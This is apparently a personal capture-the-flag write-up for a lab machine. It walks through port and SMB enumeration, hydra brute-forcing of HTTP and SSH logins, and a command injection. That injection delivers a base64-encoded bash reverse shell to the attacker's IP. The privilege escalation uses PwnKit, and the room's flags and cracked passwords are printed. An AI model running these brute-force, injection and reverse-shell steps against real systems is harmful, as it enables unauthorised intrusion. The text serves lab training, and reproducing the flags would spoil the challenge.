Don’t underestimate the sly old fox…
Enumeration
IP: 10.10.227.190
Threader3000 scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
------------------------------------------------------------
Threader 3000 - Multi-threaded Port Scanner
Version 1.0.7
A project by The Mayor
------------------------------------------------------------
Enter your target IP address or URL here: 10.10.227.190
------------------------------------------------------------
Scanning target 10.10.227.190
Time started: 2022-07-12 22:12:46.963167
------------------------------------------------------------
Port 80 is open
Port 139 is open
Port 445 is open
Port scan completed in 0:00:59.895961
------------------------------------------------------------
Threader3000 recommends the following Nmap scan:
************************************************************
nmap -p80,139,445 -sV -sC -T4 -Pn -oA 10.10.227.190 10.10.227.190
Running the suggested nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
nmap -p80,139,445 -sV -sC -T4 -Pn -oA 10.10.227.190 10.10.227.190
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-12 22:15 IST
Nmap scan report for 10.10.227.190
Host is up (0.18s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 401 Unauthorized
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=You want in? Gotta guess the password!
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX
Host script results:
|_clock-skew: mean: -20m00s, deviation: 34m38s, median: -1s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2022-07-12T16:45:20
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: year-of-the-fox
| NetBIOS computer name: YEAR-OF-THE-FOX\x00
| Domain name: lan
| FQDN: year-of-the-fox.lan
|_ System time: 2022-07-12T17:45:20+01:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.00 seconds
------------------------------------------------------------
Combined scan completed in 0:02:39.259070
Hmm, the webpage needs basic authorization:
Anyways, It runs: Apache/2.4.29 (Ubuntu) Server
Anyways we have a smb share, :P
Listing its directories:
I can access IPC$ but not yotf, hmm.
enum4linux results:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
enum4linux -a 10.10.227.190
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul 12 22:25:25 2022
=========================================( Target Information )=========================================
Target ........... 10.10.227.190
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.10.227.190 )===========================
[+] Got domain/workgroup name: YEAROFTHEFOX
===============================( Nbtstat Information for 10.10.227.190 )===============================
Looking up status of 10.10.227.190
YEAR-OF-THE-FOX <00> - B <ACTIVE> Workstation Service
YEAR-OF-THE-FOX <03> - B <ACTIVE> Messenger Service
YEAR-OF-THE-FOX <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
YEAROFTHEFOX <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
YEAROFTHEFOX <1d> - B <ACTIVE> Master Browser
YEAROFTHEFOX <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
===================================( Session Check on 10.10.227.190 )===================================
[+] Server 10.10.227.190 allows sessions using username '', password ''
================================( Getting domain SID for 10.10.227.190 )================================
Domain Name: YEAROFTHEFOX
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 10.10.227.190 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.10.227.190 from srvinfo:
YEAR-OF-THE-FOXWk Sv PrQ Unx NT SNT year-of-the-fox server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=======================================( Users on 10.10.227.190 )=======================================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: fox Name: fox Desc:
user:[fox] rid:[0x3e8]
=================================( Share Enumeration on 10.10.227.190 )=================================
Sharename Type Comment
--------- ---- -------
yotf Disk Fox's Stuff -- keep out!
IPC$ IPC IPC Service (year-of-the-fox server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.227.190
//10.10.227.190/yotf Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.227.190/IPC$ Mapping: N/A Listing: N/A Writing: N/A
===========================( Password Policy Information for 10.10.227.190 )===========================
[+] Attaching to 10.10.227.190 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] YEAR-OF-THE-FOX
[+] Builtin
[+] Password Info for Domain: YEAR-OF-THE-FOX
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: 37 days 6 hours 21 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: 37 days 6 hours 21 minutes
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 5
======================================( Groups on 10.10.227.190 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==================( Users on 10.10.227.190 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[+] Enumerating users using SID S-1-5-21-978893743-2663913856-222388731 and logon username '', password ''
S-1-5-21-978893743-2663913856-222388731-501 YEAR-OF-THE-FOX\nobody (Local User)
S-1-5-21-978893743-2663913856-222388731-513 YEAR-OF-THE-FOX\None (Domain Group)
S-1-5-21-978893743-2663913856-222388731-1000 YEAR-OF-THE-FOX\fox (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\fox (Local User)
S-1-22-1-1001 Unix User\rascal (Local User)
===============================( Getting printer info for 10.10.227.190 )===============================
No printers returned.
enum4linux complete on Tue Jul 12 22:37:25 2022
so we have 2 users: fox and rascal checking for directories and file swe can access:
1
2
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://10.10.227.190/ -t 100 --no-error -b 401,403,404
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u http://10.10.227.190/ -t 100 --no-error -b 401,403,404
Mehh, nothing
LASTTTTTTTT RESORRRRRTTTTTTTTTTTTTTTTTTTT
bruteforcing http basic auth:
1
2
3
hydra -l admin -P /usr/share/dict/rockyou.txt -s 80 -f 10.10.227.190 http-get -t 64
hydra -l fox -P /usr/share/dict/rockyou.txt -s 80 -f 10.10.227.190 http-get -t 64
hydra -l rascal -P /usr/share/dict/rockyou.txt -s 80 -f 10.10.227.190 http-get -t 64 -v
bruteforcing smb :
1
hydra -l fox -P /usr/share/dict/rockyou.txt 10.10.227.190 smb
huhhh: 
login: rascal password: bling
So now we get a webpage with the following results for blank search: 
Analyzing responses after capturing the request in burp.
Ig, it has some kind of a filter: 
Tried a random payload, :-; (error === progress) ???? the & sybmol seems to cause the issue. :P
Since its not vulnerable to sqli. It could be vulnerable to command injection.
After trying a bunch of payloads.
so we can execute whoami.
and the line ;-;
using the following command for getting a shell:
1
bash -i >& /dev/tcp/10.17.47.158/4242 0>&1
hmm, let’s try encoding it into a bash64 and then piping it out. :)
final payload:
1
2
3
{
"target": "\"; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xNy40Ny4xNTgvNDI0MiAwPiYx | base64 -d | bash \n"
}
So we finally receive a shell.
Flag 1
1
THM{Nzg2ZWQwYWUwN2UwOTU3NDY5ZjVmYTYw}
privilege escalation - fox
creds2 contains something interesting. The other files are empty. looks like base64 at first but it isn’t.
1
2
LF5GGMCNPJIXQWLKJEZFURCJGVMVOUJQJVLVE2CONVHGUTTKNBWVUV2WNNNFOSTLJVKFS6CNKRAX
UTT2MMZE4VCVGFMXUSLYLJCGGM22KRHGUTLNIZUE26S2NMFE6R2NGBHEIY32JVBUCZ2MKFXT2CQ=
hmm. server is listening at port 22. ;-;
setting up port forward:
1
./socat tcp-l:8080,fork,reuseaddr tcp:127.0.0.1:22 &
hmm so its a ssh server . :P
nothing seems to work :-;
As Ig theres nothing left, being stuck for a lot of while + that I haven’t fot a response in discord for a hint. bruteforceeeeeeeeeeeeeeeeeeee.
1
hydra -l fox -P /usr/share/dict/rockyou.txt -s 8080 -f 10.10.227.190 ssh -t 64
huhhhh.
login: fox password: lovebug
;-; didn’t get anything for rascal.
Flag 2
1
THM{Njg3NWZhNDBjMmNlMzNkMGZmMDBhYjhk}
Privilege Escalation - root
again a lot of weird stuff, I don’t even wanna try anything. just straightttttttt up run LES lmao.
creds1:
1
2
3
4
5
JV5GOMSOIRGTKTTKKV5E22SNGBGXUSL2JZCFS6SONJEXUTKUJU2E42SVGJHGUTLYJZVE2MSOIRGT
ETTKJV5E2RCNGVGXUVL2JZCE26KONJGXUT2UJV5E26SFPIFE46SZPBBWUTJTJZVFK6SNIRGTETTK
IV5E4RCNGRHGURL2JZCE26KONJKTETL2JV3U26TLPJHEIWLZJV5GOMSNKRMXQTL2JUZE4RCZPBGX
UY32JZKE252ONJIXUCSPKRGTCTL2KV5E4Z3PPJGWUTJVJV5EC6SNNJEXOTLKIF4VURCCNBBWOPJ5
BI======
cipher:
1
2
3
4
5
JV5FKMSNPJGTITTKKF5E46SZGJGXUVJSJZKFS6CONJCXUTTKJV4U26SBPJHUITJUJV5EC6SNPJMX
STL2MN5E6RCNGJGXUWJSJZCE2NKONJGTETLKLEZE26SBGIFE4VCZPBBWUTJUJZVEK6SNPJGXOTL2
IV5E6VCNGRHGURL2JVVFSMSNPJTTETTKJUYE26SRPJGWUTJSJZVE2MSNNJMTCTL2KUZE2VCNGBGX
USL2JZVE2M2ONJEXUCSNNJGTGTL2JEZE4ULPPJHVITLXJZVEK6SPIREXOTLKIF4VURCCNBBWOPJ5
BI======
Maybe I should shutdown this machine for good.
runnning LES:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
./les.sh
Available information:
Kernel version: 4.15.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 18.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
79 kernel space exploits
49 user space exploits
Possible Exploits:
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2018-18955] subuid_shell
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
Exposure: probable
Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
Download URL: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
Comments: CONFIG_USER_NS needs to be enabled
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.
[+] [CVE-2019-15666] XFRM_UAF
Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
Exposure: less probable
Download URL:
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
[+] [CVE-2017-0358] ntfs-3g-modprobe
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
Exposure: less probable
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Download URL: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
ehhh, Pwnkit works again.
now for the flag.
Flag 3
Hmm, hidden in /home/rascal:
1
THM{ODM3NTdkMDljYmM4ZjdhZWFhY2VjY2Fk}
I kinda took a shortcut for the privilege escaltion.:P You should checkout the official writeup as Its quite interesting.Official Writeup